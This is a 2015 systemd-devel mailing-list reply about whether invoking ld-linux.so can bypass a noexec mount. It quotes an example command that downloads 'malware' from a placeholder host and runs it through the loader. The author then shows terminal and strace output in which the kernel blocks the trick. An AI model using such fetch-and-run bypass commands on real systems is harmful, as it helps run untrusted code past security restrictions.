On Mon, Feb 16, 2015 at 9:40 PM, Reindl Harald <[email protected]> wrote:
> > > Am 16.02.2015 um 20:31 schrieb Mantas Mikulėnas: > >> On Mon, Feb 16, 2015 at 9:16 PM, Simon McVittie >> <[email protected] <mailto:[email protected]>> >> wrote: >> >> wget http://example.com/malware.__x86.bin >> <http://example.com/malware.x86.bin> >> /lib/ld-linux.so.2 malware.x86.bin >> >> >> Pretty sure this no longer works; these days noexec prevents >> mmap(PROT_EXEC) as well >> > > you should not assume when you can try it simple > [...] > [root@arrakis:~]$ bash /Volumes/dune/test.sh > config-3.18.7-100.fc20.x86_64 grub2 initramfs-3.18.7-100.fc20.x86_64.img > initrd-plymouth.img lost+found System.map-3.18.7-100.fc20.x86_64 > vmlinuz-3.18.7-100.fc20.x86_64 > And you should not reply before you read the actual post, in which I specifically reply to a comment about ld-linux.so – not script interpreters, which don't rely on this function. # mount | grep /test /test.img on /mnt/test type ext4 (rw,noexec,relatime,data=ordered) # cp -a /bin/echo /mnt/test/echo # chmod a+rx /mnt/test/echo # /usr/lib/ld-linux-x86-64.so.2 /mnt/test/echo /mnt/test/echo: error while loading shared libraries: /mnt/test/echo: failed to map segment from shared object # strace /usr/lib/ld-linux-x86-64.so.2 /mnt/test/echo open("/mnt/test/echo", O_RDONLY|O_CLOEXEC) = 3 mmap(0x400000, 28672, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0) = -1 EPERM (Operation not permitted) # -- Mantas Mikulėnas <[email protected]>
_______________________________________________ systemd-devel mailing list [email protected] http://lists.freedesktop.org/mailman/listinfo/systemd-devel
